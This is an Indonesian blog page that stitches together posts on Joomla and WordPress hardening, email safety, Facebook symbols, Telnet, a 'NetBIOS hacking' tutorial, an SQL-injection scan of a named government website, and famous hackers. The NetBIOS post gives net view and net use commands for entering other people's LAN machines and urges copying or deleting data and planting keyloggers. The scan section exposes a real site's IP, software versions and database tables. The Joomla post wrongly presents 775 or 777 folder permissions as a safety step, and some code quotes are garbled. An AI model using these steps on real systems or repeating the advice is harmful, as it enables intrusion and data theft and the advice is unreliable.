Follow Me

Latest Post

Hacking Joomla! dan penangananya

Written By Dejan on Monday, October 31, 2011 | 10:06 PM



Beberapa waktu yang lalu ada keluhan dari seorang teman, yang menyatakan bahwa situsnya terkena serangan. Sang teman menggunakan CMS Joomla! sebagai engine web yang dimilikinya. Saya cek di TKP ternyata benar, halaman utama dan administratornya telah berganti wajah (defaced). Pertanyaanya adalah mengapa hal ini terjadi?


Sebenarnya saya cukup dibuat gusar oleh sang teman. Alasanya karena dia mencurigai saya terus-menerus sebagai dalang perusak situsnya. Loh kok?..saya juga bingung dengan hal tersebut. Saya beranggapan dia mencurigai saya karena mencoba bersaing secara tidak sehat. Aneh juga sih... ntahlah, mungkin dia menggunakan Blog saya sebagai alibi. Toh blog saya lahir semenjak 3 tahun yang lalu sebagai media sharing pengalaman saja. Jadi kalau dia mengganggap Blogger = Cracker, mungkin ada benarnya juga. Masih untung ada Cracker yang mau berbagi ilmu dengan menjadi Blogger. Satu lagi, jangan singgung masalah mental Blogger dong. Risih saya mendengarnya. Tidak ada aturan khusus di negara ini mengenai konten blog apa yang boleh atau tidak. Asalkan konten tidak berbau pornografi dan SARA semua boleh-boleh saja. Saya juga bukan tipe perusak seperti yang dianggap. Walaupun untuk memposting sebuah artikel saya harus melakukan percobaan terlebih dahulu. Sekali lagi Blogger tetap Blogger, Cracker tetap Cracker atau bisa keduanya Cracker merangkap sebagai Blogger.



Okey kembali ke pengakuan. Meskipun saya sedikit tahu teknik defaced web denganSQL Injection atau XSS (cross site scripting)Sumpah..Bukan saya pelakunya!. Di luar sana bergentayangan dedemit maya ratusan jumlahnya dengan trisula di tanganya . Kalau anda seorang admin web, tentunya anda dapat melacak jejak sang pembongkar dari LOG yang disediakan oleh server. Cara mudahnya anda juga bisa MERESTORE ke tanggal yang lebih lama, dan langsung bisa sehat. Ngapain harus upload ulang dengan domain dan web hosting baru. Suatu tindakan membuang duit saja menurut saya. Kecuali kalo server yang anda gunakan tidak menyediakan fasilitas BACKUP harian. Kalau begitu salahkan admin servernya dong.

Mengapa di HACK?
Bukan itu pertanyaan yang tepat. Kalau itu yang anda tanyakan, jawabanya akan sangat panjang. Pertanyaan yang tepat adalah, "Bagaimana bisa diHack?...Okey saya jelaskan sebatas kemanpuan saya.
Anda tahu dengan CRAWLER? itu adalah hewan peliharaan tuan GOOGLE. Dia adalah Laba-laba mesin raksasa yang tugasnya menjaring informasi website yang ada di dunia. Kehebatanya jangan diragukan. Kalau anda meragukan berarti anda juga meragukan Google sebagai mesin pencari no.1 di dunia. Spidernya Google ini dapat menangkap informasi sebuah website paling lama 7 hari kerja.
Lantas apa hubunganya? Sama seperti jarak matahari dengan bumi yang 10 menit. Website anda akan terdeteksi dengan baik oleh Link Scanner setelah 7 hari diaktifkan. Istilahnya Google Hacking. Silakan cara referensi Google Hacking di Internet. Intinya para hacker memanfaatkan Google sebagai Link Scanner situs- situs mana yang memiliki celah. Hanya dalam 7 hari. (seperti iklan produk kecantikan aja, he..he). Jadi jangan salahkan saya hanya karena saya yang tahu informasi website anda sebelumnya. Website anda sudah tayang 7 hari bukan?. Feuh....payah.

Kembali ke permasalahan. Joomla! merupakan CMS populer yang paling banyak digunakan oleh pengguna website, termasuk saya. Keunggulan Joomla tidak perlu dijelaskan lagi. Silakan datang ke toko buku di kota anda dan pilih sendiri puluhan judul buku yang membahas Joomla!.

Karena Joomla! banyak digunakan, jadi sudah pasti CMS ini jadi sasaran bulan- bulanan oleh para cracker. Berikut ini beberapa tips pengalaman saya menggunakan Joomla! dan teknik mengamankanya:

1. Update Continues
Sama seperti anti virus di komputer, Joomla! juga memerlukan update secara rutin. Terlambat sedikit saja tidak mengundape Core Joomla!, silakan tunggu saja serangan ke website anda.
Kapan kita melakukan Update?
Tidak seperti anti virus yang dapat langsung melakukan update jika kondisi dalam keadaan kritis. Joomla! harus diupdate secara manual.
Kapan waktu yang tepat?
Yang jelas ketika ada informasi celah keamanan pada versi Joomla! yang kita gunakan. Untuk lebih mudahnya anda bisa berlangganan RSS Feed melalui e-mail issue keamanan Joomla! di Joomla! Security Announcements. Jika terdapat celah keamanan pada sistem joomla!, maka akan ada informasi yang dikirimkan melalui e- mail untuk segera melakukan patching.
Beberapa orang mungkin masih bingung cara menginstal Joomla! Patch Package. Caranya adalah dengan menggunakan FTP Client misalnya FileZilla. Silakan cari di Google softwarenya dan caranya. Atau kirim e-mail ke saya, nanti saya jelaskan melalui chat.

2. No Hole
artinya?... tau ah, istilah saya aja itu. Jika anda pengguna web hosting pemula biasanya masih bingung dengan istilah ini. Pada direktori web hosting ada istilah folder access bukan? nah itu dia..Jadi pastikan direktory access pada posisi 775 atau 777 pada setiap folder. Kalau masih bingung tanyakan aja deh ke admin supportnya web hosting atau baca di manualnya deh.
....(saya menulis artikel ini sedang tidak didepan server dan dalam kondisi buru- buru, makanya tidak bisa detail, maaf ya)

3. Gunakan plugin jSecure
Plugin yang satu ini saya akui kehebatanya. Dengan plugin ini anda bisa mengganti URL halaman administrator default ke URL khusus. Tahukan, halaman administrator joomla dapat diakses di http://sitename.com/administrator. Plugin jSecure akan memindahkan alamat admin tersebut ke dalam bentuk http://sitename.com/administrator/?keyname. Keyname dapat anda buat sendiri sesuka hati.
Jadi dengan plugin ini anda bisa melindungi halaman login administrator. Lebih aman bukan?
4. Hati-hati menginstal Componen, Module dan Plugin
Serangan Joomla tidak hanya dilakukan melalui Core Joomla!. Sebagian besar justru melalui komponen, module, plugin atau templatenya. Jadi pastikan sebelum memilih module, komponen dan plugin, pastikan sumber websitenya jelas dan memiliki rating pengguna yang banyak serta tidak banyak keluhan.
Mudahnya, cari langsung dari sumbernya di Joomla! Ekstention. Kemudian baca reviewnya dan pastikan kondisinya aman.

5. Template premium tapi warez
Kehebatan Joomla! salah satunya adalah adanya beragam template menarik yang siap diunduh dimana saja. Template menarik pastinya yang premium. Namun anda harus menebusnya dengan cara membeli. Atau cara klasik lama dengan mencarinya di situs warez atau filesharing. Disana terdapat ratusan template premium siap unduh dan siap pakai.
Pertanyaanya apakan aman digunakan?
Saya jawab aman jika anda tahu menggunakannya. Namun sangat tidak aman jika langsung memakainya mentah- mantah.
Mengapa?
Template premium biasanya langsung berisi core, komponen, module dan plugin siap pakai dalam paket template yang disertakan. Enak sih, karena langsung jadi tinggal ganti artikel saja. Sayangnya hampir seluruh komponen yang disertakan dalam versi jadul. Kalau versi jadul digunakan sudah pasti mudah diserang toh?... anak kecil aja tahu jawabanya.
Jadi kalau anda menggunakan template premium abal-abal, pastikan juga anda menpacth core, komponen, module dan plugin yang disertakan di dalamnya. Cukup repot bahkan kemungkinan crashnya tinggi. Namun gimana lagi. Daripada setelah dipasang seminggu langsung diserang! iya ngga?
6. Ngumpul di Komunitas Joomla
Anda tak akan pintar tanpa bantuan orang lain. Oleh karena itu, untuk mempercepat wawasan anda tentang Joomla! silakan gabung di komunitas Joomla!. Cek di Joomla! ID

Wokeh... cukup panjang penjelasan saya. Kalau begitu sata akhiri saja deh. Namun sebelumnya saya tambahkan lagi beberapa catatan kecil sebagai pemertegas:

Pertama saya bukan tukang deface situs. Jadi jangan lagi menuduh saya yang melakukanya, apalagi berkoar-koar meminta dukungan di jejaring sosial. Takutnya saya nanti jadi terkenal, wkwkwk.
Kedua jangan salahkan Blog saya, karena melalui blog inilah saya masih menjadi orang baik yang mau membagikan segelintir ilmu yang saya peroleh dengan cucuran keringat.
Ketiga banyaklah belajar termasuk belajar dari pengalaman. Saya bukan tidak pernah kena defaces, bahkan hampir tiga kali web saya pernah kena defaces. Bedanya saya memperbaikinya dengan kepala dingin, tidak menuduh apalagi mempropagandakan dengan orang banyak. Nampak sekali bodohnya kita, sudah jatuh cerita pula..wkwkwk
Keempat saya mohon maaf jika ocehan saya di atas tidak berkenan dengan hati pembaca. Saya hanya manusia biasa yang masih harus banyak belajar dan saling melengkapi. Tapi kalau tidak dimaafkan, mungkin waktu dan pengalaman akan menjelaskanya sendiri.

Maju terus teknologi informasi Indonesia

Tips Menjaga Keamanan Email

Written By Dejan on Sunday, October 30, 2011 | 11:06 PM

Selamat malam semuanya, kembali kita akan membahas security tentang email, cara menjaga email & bagaimana caranya supaya email kita aman dari tindakan pencurian, cracking, penyalahgunaan, dsb.
Yang perlu kita perhatikan tentang email adalah:
Email
  1. Email menjadi SANGAT PENTING karena menjadi tempat & sumber dari segala registrasi dunia maya yang kita miliki, dimana didalamnya terdapat informasi mengenai data & informasi yang keluar dan masuk ke kita.
  2. Email harus dibuat dengan sebenar-benarnya agak bisa dipertanggung jawabkan ketika terjadi tindakan penyalahgunaan email & tidak perlu lagi tanya sana-sini untuk cari solusinya apabila terjadi penyalahgunaan email.
Berikut adalah contoh video pembuatan yahoo email yang saya ambil dari Youtube:

Setelah kita pelajari contoh di atas, maka yang perlu anda perhatikan adalah:
  1. ANDA HARUS MEMBUAT INFORMASI EMAIL DENGAN SEBENAR-BENARNYA UNTUK MEMPERMUDAH VERIFIKASI & IDENTIFIKASI KETIKA TERJADI PENYALAHGUNAAN TERHADAP EMAIL.
  2. ISILAH ALTERNATE EMAIL SEBAGAI EMAIL KEDUA, SEHINGGA KETIKA TERJADI PENYALAHGUNAAN TERHADAP EMAIL, ANDA MENDAPATKAN INFORMASI PERUBAHAN EMAIL YANG TERJADI & MASIH BISA MELAKUKAN PEMBATALAN PERUBAHAN DARI ALTERNATE EMAIL.
  3. ISILAH SECURITY QUESTION & ANSWER DENGAN SESUATU YANG SULIT UNTUK DITEBAK NAMUN MUDAH DI INGAT OLEH ANDA.
  4. ISILAN CONTACT PHONE NUMBER UNTUK MEMPERMUDAH ANDA KETIKA TERJADI PERUBAHAN TERHADAP EMAIL & FORGOT PASSWORD .
  5. GUNAKAN ADVANCED SETTING ACCOUNT SECARA MAKSIMAL (EDIT ACCOUNT / ACCOUNT OPTION / MANAGE ACCOUNT, DSB).
  6. WAJIB!! JANGAN PERNAH SAMAKAN ANTARA PASSWORD EMAIL YANG SATU DENGAN YANG LAINNYA.
Kemudian untuk memperkuat penjagaan email, saran Saya selanjutnya adalah:
  • Gunakan Password Yang Kompleks (Minimal Ada: Angka, Huruf & Simbol).
  • Gunakan Password Yang Panjang (Minimal: 10 Karakter).
  • Gantilah Email Secara Berkala (Minimal: 6 Bulan Sekali).
  • Berhati-hatilah bila online di tempat umum (Pastikan tidak ada keylogger / backdoor di komputer tersebut) sebelum anda login.
  • Pastikan URL Address Website dengan benar, agar anda tidak salah login.
  • Jangan pernah memasukkan username & password email apabila ada permintaan pengisian username & email di Website selain penyedia jasa Email (URL yang bukan sebenarnya) (Kebanyakan Ini Scam / Phising).
  • Sering baca update security di website-website yang biasa anda kunjungi.
Setiap Email Provider Memiliki Help Central Masing-Masing, Bagi Anda Yang Belum Tahu, Berikut Listnya:
1. YAHOO: http://help.yahoo.com/
2. GMAIL: http://mail.google.com/support/
3. HOTMAIL/MSN: http://help.msn.com/
Jika terjadi sesuatu terhadap email anda, tidak perlu panik, yang perlu anda lakukan adalah:
  1. Cek alternative email anda, silakan cancel perubahan yang terjadi. Kemudian, silakan ganti password email anda, cek kembali konfigurasi email anda, ganti secret question & pastikan tidak ada backdoor di email anda.
  2. Apabila anda tidak mempunyai alternate email, cobalah ingat security question & answer anda kemudian silakan masukkan di forgot password.
  3. Klo masih belum bisa juga, silakan coba hubungi help center dari provider penyedia layanan email.
Belajarlah dari Help Center & tanyakan kepada Ahlinya (Help Center Support) apabila terjadi masalah pada email Anda. Jangan bertanya kepada orang yang tidak jelas yang menawarkan bantuan kepada Anda dengan meminta username & password anda (Kenyataannya: Inilah Tindakan Paling Konyol & Sembrono Yang Dilakukan Banyak Orang, Karena Anda Sendirilah Yang Memberikan Username & Password Anda Kepada Penjahat Yang Sesungguhnya). Atau mintalah bantuan / saran kepada orang yang tepat, paham, mengerti & sudah anda kenal.

SARAN TERAKHIR:
  1. JIKA ANDA BENAR-BENAR MEMBUTUHKAN EMAIL, MAKA ANDA HARUS MENGISI SELURUH KEBUTUHAN INFORMASI UNTUK EMAIL TERSEBUT. JANGAN PERNAH MENYESAL & MENYALAHKAN ORANG LAIN JIKA EMAIL ANDA RAIB KARENA KESALAHAN YANG DISEBABKAN OLEH ANDA SENDIRI & KESALAHAN TERSEBUT SUDAH ANDA LAKUKAN SEJAK AWAL PEMBUATAN EMAIL.
  2. JANGAN LUPA UNTUK SELALU UPDATE EMAIL (Alamat, No. Telp, Alternate Email, Security Question & Answer, Dsb).
Sekian tips menjaga email dari saya, semoga bermanfaat & silakan di share ke teman-teman terdekat :)
Enjoy & Eat It! Jangan lupa follow twitter saya, tinggal click aja disini: Follow Utuh Wibowo Twiiter

Mengamankan Blog CMS Wordpress Dari Serangan Hacker

Kali ini saya akan memberikan sedikit ilmu bagaimana caranya mengamankan blog dari serangan orang orang yang tidak bertanggung jawab atau dari orang yang kurang kerjaan. Tutorial ini dikhususkan untuk anda yang menggunakan hosting berbayar. Tidak sedikit orang yang membuat blog di hosting berbayar dengan membuat blog menggunakan script CMS Wordpress, yang blognya terkena deface atau mengubah tampilan blog menjadi hancur berantakan. Di sarankan di dalam menginstall script CMS wordpress JANGAN PERNAH menginstall secara instan, biasanya script di install ke dalam hosting secara otomatis/instan lebih rentan keamanannya. Secara instan disini maksudnya seperti anda menggunakan fasilitas softaculous yang ada di control panel CPANEL hosting untuk menginstall script wordpress ke dalam hosting.
Lebih amannya anda sebaiknya menginstall script wordpress dengan cara manual dan mendownload file script nya langsung ke situs pembuatnya melalu link dibawah ini.
Setelah anda download , anda buat file database terlebih dahulu di dalam control panel hosting. Setelah membuat file database beserta username dan password database, maka langkah selanjutnya anda buka file script wordpress yang terkompress .zip atau .gzip . Anda extrack file wordpress yang terkompress itu ke dalam harddisk anda lalu anda buka file wp-config-sample.php dengan menggunakan notepad saja. Lalu anda masukkan konfigurasi dari nama database, username dan password database yang telah anda buat di control panel hosting. Setelah selesai, anda simpan file wp-config-sample.php tadi dengan nama file baru dengan nama filenya wp-config.php . Setelah tersimpan file wp-config.php, anda delete file wp-config-sample.php.
Untuk memasukkan isian dibawah ini, anda bisa mendapatkan key unik melalui link https://api.wordpress.org/secret-key/1.1/
define(?AUTH_KEY?, ?put your unique phrase here?);
define(?SECURE_AUTH_KEY?, ?put your unique phrase here?);
define(?LOGGED_IN_KEY?, ?put your unique phrase here?);
define(?NONCE_KEY?, ?put your unique phrase here?);
Sebagai contoh setelah saya membuka link https://api.wordpress.org/secret-key/1.1/, maka saya mendapatkan key unique.
Karena key unique diatas sebagai contoh saja, tentu saja kalau anda membuka link https://api.wordpress.org/secret-key/1.1/ ini akan mendapatkan key unique yang berbeda dari contoh diatas.
Untuk lebih amannya lagi sebaiknya nama table prefix standar dari wordpress anda rubah, defaultnya seperti ini
$table_prefix  = ?wp_?;
bisa anda rubah misalkan menjadi
$table_prefix  = ?PE97_?;
silahkan anda rubah sesuai keinginan anda.
Setelah langkah diatas selesai di lakukan anda bisa upload keseluruhan script wordpress ke dalam hosting anda, bisa menggunakan file manager atau bisa juga menggunakan FTP client. Cara cepat bagi saya menggunakan file manager yang ada di control panel hosting, anda kompress terlebih dahulu semua file script wordpress menjadi .zip lalu anda upload file .zip itu menggunakan file manager yang ada di cpanel, lalu anda extrack file .zip tadi.
Langkah langkah diatas merupakan cara cara yang lebih aman di dalam menginstall script cms wordpress, yang script cms wordpress  ini berguna untuk membuat blog pribadi atau blog komersil.
Apabila anda telah memiliki blog yang telah jadi, langkah berikut adalah cara mengamankan blog supaya lebih aman. Cara cara yang akan saya berikan ini adalah cara untuk meminimalkan dari serangan hacker atau serangan orang iseng terhadap blog milik anda.
Langkah Pertama adalah di dalam membuat password cpanel ataupun password database, termasuk membuat nama file dan username database SQL usahakan gabungan antara karakter huruf besar, huruf kecil, angka dan spesial karakter. Makin panjang karakter makin bagus. Jangan membuat nama file database, username database dan password database yang mudah di tebak oleh orang lain.
Langkah Kedua adalah username default  ?admin? untuk masuk ke dashboard wordpress dirubah dengan username lain, bagusnya gabungan angka , huruf besar, huruf kecil. Makin panjang karakter username makin aman. Cara merubahnya anda bisa buka melalui link ini
http://namadomainanda.com/wp-admin/profile.php
Langkah Ketiga adalah Username / Author yang ingin di tampilkan di setiap postingan artikel di blog harus berbeda dengan username yang di pakai untuk masuk ke dashboard wordpress. Caranya merubah tampilan username di postingan blog sama yaitu di
http://namadomainanda.com/wp-admin/profile.php
Langkah ke empat adalah melindungi file wp-config.php dengan cara menambahkan kode dibawah ke dalam file .htaccess
<Files wp-config.php>
order allow,deny
deny from all
</Files>
Jangan lupa pula lindungin file .htaccess nya juga , caranya taruh kode dibawah di dalam .htaccess, taruhnya di posisi teratas.
<Files .htaccess>
order allow,deny
deny from all
</Files>
Untuk pengguna hosting dengan control panel CPANEL, file .htaccess lokasinya ada di
/home/username/public_html
Langkah Ke lima adalah melindungi  file wp-login.php, kalo di file manager bisa di lihat letaknya ada disini :
/home/username/public_html/wp-login.php
Cara melindunginya tambahkan kode dibawah ke dalam .htaccess
<IfModule mod_rewrite.c>
RewriteCond %{REQUEST_URI} wp-login.php
RewriteCond %{REMOTE_ADDR} !^XXX.XXX.XXX
RewriteRule .* http://www.namadomainanda.com/ [R,L]
</IfModule>
^XXX.XXX.XXX   <== isikan dengan alamat IP ISP yang di pakai
Karena alamat IP bawaan ISP selalu berubah maka oleh sebab itu di  range alamat IP isp yang anda gunakan.
Langkah ke enam melindungi folder wp-admin dengan membuat file .htaccess baru yang lokasi folder ada di
/home/username/public_html/wp-admin/
Buat file .htaccess baru dengan memasukkan kode dibawah ini
Order deny,allow
Deny from All
Allow from xxx.xxx.xxx.xxx <? alamat IP ISP yang anda gunakan
setelah itu file .htaccess yang telah dibuat anda upload ke dalam folder wp-admin.
/home/username/public_html/wp-admin/
Langkah terakhir adalah dengan memasang plugin wordpress bernama Limit Login Attempts. Bisa anda download melalui link dibawah ini
Fungsi dari plugin wordpress Limit Login Attempts adalah memproteksi file wp-login.php agar ada pembatasan di dalam kesalahan memasukkan password. Maksudnya apabila ada orang lain yang mencoba membrute force atau menebak password salah berulang kali, maka alamat ip yang di gunakan akan di kunci. Dan tidak bisa memasukkan password lagi dalam rentang waktu yang telah di tentukan.
Plugin Limit Login Attempts ini sebagai antisipasi saja, apabila ada orang lain yang menggunakan alamat IP isp yang sama dengan alamat IP isp yang anda gunakan.
Bila anda ingin memakai plugin wordpress atau themes wordpress, usahakan anda selalu mendownload dari situs yang bisa di percaya, misalkan di situs wordpress.org. Dilihat apakah plugin wordpress yang ada di dalamnya ada review baik atau review buruk.
Sekian tutorial yang bisa saya sharing melalui blog pribadi keren saya ini...kekeke . Semoga artikel yang saya buat ini bisa bermanfaat oleh banyak orang yang membacanya... Amiennn.

Karakter Unik Untuk Nickname Facebook, Komentar Dan Lain - Lain

Written By Dejan on Saturday, October 29, 2011 | 11:19 PM

facebook symbols face 01: ㋡
facebook symbols face 02: ㋛
facebook symbols face 03:ツ
facebook symbols face 04:【ツ】

Heart symbols on facebook:

❤ ❥ ♡ ♥ ღ ɞ

Facebook Flowers Symbol:

❀ ✿ ❁ ✾ ✽ ❃ ❋

Facebook Butterfly Symbols:

Butterfly symbol 01: Ƹ̴Ӂ̴Ʒ

Butterfly symbol 02: ƸӜƷ

Butterfly style 03: εїз

Facebook Music Symbols:

♪ ♫ ♩ ♬ ♭ ♮ ♯

Stars facebook symbols

★ ✩ ✮ ✯ ✰ ☆ ⋆ ╰☆╮✡ ۞

Snowflake facebook symbols:

❇ ❈ ❅ ❄ ❆

Religion & belief facebook symbols

☯ ✡☨ ✞ ✝☥ ☦ ☧ ☩ ☪ ☫ ☬ ☭


Peace facebook symbols: ✌☮


Facebook Poker Symbols:

Poker black: ♥ ♦ ♣ ♠

Poker White: ♡ ♢ ♤ ♧

Zodiac symbols for facebook

♈ – Aries (The Ram)
♉ – Taurus (The bull)
♊ – Gemini (The Twins)
♋ – Cancer (The Crab)
♌ – Leo (The Lion)
♍ – Virgo (The Virgin)
♎ – Libra (The Scales)
♏ – Scorpio (The Scorpion)
♐ – Sagittarius (Centaur The Archer)
♑ – Capricorn (Goat-horned, The sea goat)
♒ – Aquarius (The water bearer)
♓ – Pisces (The fish)

Chess black facebook symbols :

♚ ♛ ♜ ♝ ♞ ♟

Chess White Facebook Symbols:

♔ ♕ ♖ ♗ ♘ ♙

Crosses facebook symbols:

☩ ☨ ☦ ✙ ✚ ✛ ✜ ✝ ✞ ✠


Moon symbols ☾ ☽

Sun symbols: ☼ ☀

Cloud and umbrella ☁ ☂

Snowman: ☃

Comet: ☄

Apple symbol for facebook: Ѽ

Risk radioactive and biological: ☢ ☣

Check symbol for facebook ✓

Hands pointing

☚ ☛ ☜ ☝ ☞ ☟

Writing Symbols

✉ ✍ ✎ ✏ ✐✑✒ ⌨


Scissors symbols: ✂ ✄

Phones symbols: ☎ ☏ ✆

Clocks:⌛ ⌚

Airplane facebook symbol: ✈

Dinner: ♨
Skull symbol: ☠

Decorative symbols: ๑ ۩ ۞


Numeric facebook symbols:

①②③④⑤⑥⑦⑧⑨⑩ ⑪⑫⑬⑭⑮⑯⑰⑱⑲⑳

Letters:

ⒶⒷⒸⒹⒺⒻ ⒼⒽⒾⒿⓀⓁ ⓂⓃⓄⓅⓆⓇ ⓈⓉⓊⓋⓌⓍ ⓎⓏ
ⓐⓑⓒⓓⓔⓕ ⓖⓗⓘⓙⓚⓛ ⓜⓝⓞⓟⓠⓡ ⓢⓣⓤⓥⓦⓧⓨⓩ

you can write your own words, for example:!!


Facebook symbols = Ⓕⓐⓒⓔⓑⓞⓞⓚ Ⓢⓨⓜⓑⓞⓛⓢ


Oriental symbols:

㊊㊐㊋㊌㊍㊎㊏ ㊐㊑㊒㊓㊔㊕㊖㊗ ㊀㊁㊂㊃㊄㊅㊆ ㊇㊈㊉

Remote Komputer Dengan Telnet

Written By Dejan on Wednesday, October 26, 2011 | 5:12 AM

Apa itu Telnet? Telnet (Telecommunication Network) adalah protokol jaringan yang digunakan untuk mengkoneksikan / menghubungkan beberapa komputer dalam satu jaringan. Telnet ini biasanya dijalankan di Command Prompt, interface yang digunakan adalah Command Line Interface (Text Base). Disini saya akan menjelaskan bagaimana mengaktifkan Telnet dan perintah dasar Telnet pada Windows Command Prompt (CMD) di Windows 7. Komputer yang saya Telnet menggunakan Windows XP.
Perintah-perintah dasar pada Command Prompt (CMD) harus mutlak kita ketahui, karena banyak menggunakan perintah dasar CMD untuk menelusuri isi dari komputer yang kita remote. Langkah-lahkahnya sebagai berikut:
  • Di windows ktifkan service Telnet. Dari Start --> Control Panel.
  • Pada pilihan View by, pilih Category.
  • Pilih icon Programs.
  • Pilih Turn Windows features on or off.
  • Cek list Telnet Client.
  • Pilih OK, maka proses fitur untuk Telnet akan di aktifkan, tunggu beberapa saat.
  • Untuk memastikan apakah Telnet kita sudah aktif silahkan cek di Command Prompt (CMD) dan ketikkan perintah Telnet. Jika ada tampilan seperti gambar di bawah berarti Service Telnet Client sudah aktif. Untuk keluar ketikkan quit
Pada Windows XP secara default di Command Prompt perintah Telnet bisa digunakan. Jika kita meremote komputer Windows XP dari komputer lain kita tidak bisa mengakses full. Supaya komputer lain bisa mengakses full kita harus mengaktifkan service Telnet pada Windows XP.
Langkah-langkahnya sebagai berikut:
  • Klik Start > Control Panel.
  • Pilih Administrative Tools.
  • Kemudian pilih icon Services
  • Pilih service Telnet. Secara default Startup Type untuk Telnet bernilai Disable. Jika di remote dari komputer lain tidak memberikan full akses. Disini kita mengubah nilai menjadi Automatic.
  • Klik 2 kali Telnet, kemudian ganti Startup Type menjadi Automatic. Klik tombol Apply > Start > OK
Settingan sudah selesai, kini saatnya kita meremote Windows XP dari Windows 7.
  • Di Windows 7 (dengan IP Address 192.168.1.10) buka Command Prompt (CMD), kemudian ketikkan perintah telnet
  • Kemudian akan muncul tampilan Welcome to Microsoft Telnet Client.
  • Pada windows XP yang akan diremote menggunakan telnet, sudah diset IP Addressnya, yaitu: 192.168.1.11, yang tentunya sudah terkoneksi dengan Windows 7. Untuk uji koneksi silahkan buka Command Prompt (CMD) baru kemudian lakukan ping ke IP komputer yang akan di remote atau sebaliknya. Jika belum ada replay silahkan perbaiki.
  • Di Windows 7, Ketikkan perintah open 192.168.1.11.  kemudian akan ditanyakan Do You want to send any way? jawab ya denga menekan tombol Y dan kemudian tekan Enter.
  • Setelah itu minta login user pada windows XP. Ketikkan Administrator dan password.
  • Akhirnya selesai juga. Jika berhasil tampilannya akan seperti dibawah ini. Disini kita bisa melihat, edit, menghapus, dan sebagainya.
Semoga bermanfaat   ^_^.

Remote komputer dengan Netbios Hacking

 
 
 
 
 
 
i
 
1 Vote
Quantcast
Hacking menggunakan metode Netbios atau lebih dikenal dengan Netbios Hacking merupakan teknik hacking klasik yang bisa kita pelajari dan tidak salah untuk dipraktekkan. Hacking Netbios cocok diterapkan pada jaringan LAN, semisal warnet atau jaringan kantor.
Hal utama yang dibutuhkan dalam Netbios Hacking adalah IP Address. Ada berbagai tools dan sofware yang dapat digunakan untuk menscan IP Address yang sedang aktif pada jaringan lokal, misalnya Look at Lan, IP Scanner, dll. Pelajari penggunaanya disini.  Langkah-langkah Netbios Hacking :
  1. Buka command Prompt, atau pada run ketik cmd kemudian enter.
  2. Pada command prompt ketik netview \\ip_address, misalnya C:\>net view \\192.168.1.1
Jika tidak ada pesan error yang ditampilkan, coba dengan IP Address yang berbeda. Jika sukses tidak ada pesan error, lanjutkan dengan perintah yang lain dibawah ini.
C:\>net use C:\\192.168.1.100
C:\>net use D:\\192.168.1.100\SharedDocs
C:\>net use F:\\192.168.1.100\Myprint
Pada contoh-contoh di atas menunjukan beberapa perintah yang biasa digunakan. C:,D:, dan F: adalah drive yang biasa terdapat di komputer. Perintah pertama bertujuan untuk mengakses drive C. Perintah kedua (SharedDocs) digunakan untuk mengakses Dokumen yang di sharing sedangkan perintah ketiga (Myprint) dipakai untuk mengakses printer komputer yang akan diremote.
Jika tampil pesan “The commad completed successfully”, berarti perintah yang dilakukan berhasil meremote komputer korban. Langkah selanjutnya tinggal mengobrak-abrik komputer korban, mencopy, menghapus data, memasukan virus, spyware, trojan atau keylogger.
Menarik bukan?… Hacking netbios dapat dijadikan awal kita memulai aktifitas hacking di jaringan. wew….
Catatan: Hacking netbios yang dapat dijalankan pada komputer yang tidak terlindungi oleh Firewall. Jadi jika Firewall komputer diaktifkan maka akan tampil pesan error. Stop dan coba dengan IP Address yang berbeda.
Selamat mencoba

SQL Injection Vulnerability on DEPKES.GO.ID

Analyzing http://www.depkes.go.id/index.php/component/depkesdownload/index.php?option=com_depkesdownload&itemid=21
Host IP: 202.70.136.4
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
Keyword Found: Pedoman
Injection type is String (')
DB Server: MySQL >=5
Selected Column Count is 6
Finding string column
Valid String Column is 2
Target Vulnerable :D
Current DB: portal
Count(table_name) of information_schema.tables Where table_schema=0x706F7274616C is 89
Tables found: jos_assignments,jos_banner,jos_bannerclient,jos_bannertrack,jos_categories,
jos_components,jos_contact_details,jos_content,jos_content_frontpage,
jos_content_rating,jos_core_acl_aro,jos_core_acl_aro_groups,
jos_core_acl_aro_map,jos_core_acl_aro_sections,jos_core_acl_groups_aro_map,
jos_core_log_items,jos_core_log_searches,jos_downloads,jos_downloads_blob,
jos_downloads_category,jos_downloads_classify,jos_downloads_containers,
jos_downloads_file_classify,jos_downloads_files,jos_downloads_folders,
jos_downloads_log,jos_downloads_repository,jos_downloads_reviews,
jos_downloads_structure,jos_downloads_text,jos_groups,jos_hwdvidsantileech,
jos_hwdvidscategories,jos_hwdvidsfavorites,jos_hwdvidsflagged_groups,
jos_hwdvidsflagged_videos,jos_hwdvidsgroup_membership,jos_hwdvidsgroup_videos,
jos_hwdvidsgroups,jos_hwdvidsgs,jos_hwdvidslogs_archive,
jos_hwdvidslogs_favours,jos_hwdvidslogs_views,jos_hwdvidslogs_votes,
jos_hwdvidsplugin,jos_hwdvidsrating,jos_hwdvidsss,jos_hwdvidsvideos,
jos_jdownloads_cats,jos_jdownloads_config,jos_jdown

Hacker-hacker terbaik sepanjang masa

Postingan saya kali ini membahas para hacker terbaik di dunia untuk menambah wawasan sobat blogger semua tentang dunia seputar dunia hacking. Check this out!

Kevin Mitnick
Kevin adalah hacker pertama yang wajahnya terpampang dalam poster "FBI Most Wanted". Kevin juga seorang "Master of Deception" dan telah menulis buku yang berjudul "The Art of Deception". Buku tersebut menjelaskan berbagai teknik social engineering untuk mendapatkan akses ke dalam sistem.


Linus Torvalds
Seorang hacker sejati, mengembangkan sistem operasi Linux yang merupakan gabungan dari "LINUX MINIX". Sistem operasi Linux telah menjadi sistem operasi "standar" hacker. Bersama Richard Stallman dengan GNU-nya membangun Linux versi awal dan berkolaborasi dengan programmer, developer, dan hacker seluruh dunia untuk mengembangkan kernel Linux.

John Draper
Penemu nada tunggal 2600 Hz menggunakan peluit plastik yang merupakan hadiah dari kotak sereal. Merupakan pelopor penggunaan nada 2600 Hz dan dikenal sebagai Phone Phreaker. Nada 2600 Hz digunakan sebagai alat untuk melakukan pemanggilan telepon gratis. Pada pengembangannya, nada 2600 Hz tidak lagi dibuat dengan peluit plastik, melainkan menggunakan alat yang disebut "Blue Box".

Mark Abene
Sebagai salah seorang "Master of Deception" phiber optik, menginspirasikan ribuan remaja untuk mempelajari sistem internal telepon negara. Phiber optik juga dinobatkan sebagai salah seorang dari 100 orang jenius New York Magazine. Menggunkan komputer Apple, Timex Sinclair Commodore64. Komputer pertamanya adalah Radio Shack TRS-80 (trash-80).

Robert Morris
